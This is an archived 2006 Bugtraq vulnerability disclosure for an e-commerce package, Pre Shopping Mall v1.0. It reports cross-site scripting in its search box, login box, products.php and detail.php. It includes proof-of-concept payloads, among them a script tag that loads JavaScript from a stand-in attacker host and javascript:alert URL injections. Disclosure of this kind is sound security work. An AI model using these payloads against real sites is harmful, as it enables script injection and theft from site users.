lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <20060524100210.15079.qmail@securityfocus.com>
Date: 24 May 2006 10:02:10 -0000
From: luny@...fucktard.com
To: bugtraq@...urityfocus.com
Subject: Pre Shopping Mall v1.0


Pre Shopping Mall

Homepage:
http://www.preprojects.com/emall.asp

Description:
PRE SHOPPING MALL a power full ecommerce shopping mall solution. If you need to setup a online shop or shopping mall PRE SHOPPING MALL is your quickest solution. You can setup your Emall within few hours. Buy install and start selling your products. Very easy to installs and manage powerful administration. Receive payments either through Paypal or Authorize.net. Quickest solution for your online business.

Effected files:
search box.
detail.php
products.php

Exploits & Vulns:

XSS Vulnerabilities:

The search and login  box does not sanatize user input before generating it dynamically. This could cause XSS.

For proof of concept just try putting this in the search box:
'';!--"<XSS>=&{()}'';!--"<XSS>=&{()}<SCRIPT SRC=http://www.evilcode.com/xss.js></SCRIPT>'';!--"<XSS>=&{()}'';!--"

<XSS>=&{()}

More XSS Vulns:
For the XSS examples we'll use url injection with the tag: <IMG%20SRC=javascript:alert('XSS')>
http://www.example.com/emall/products.php?cid=[XSS]
http://www.example.com/emall/detail.php?prodid=[XSS]

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ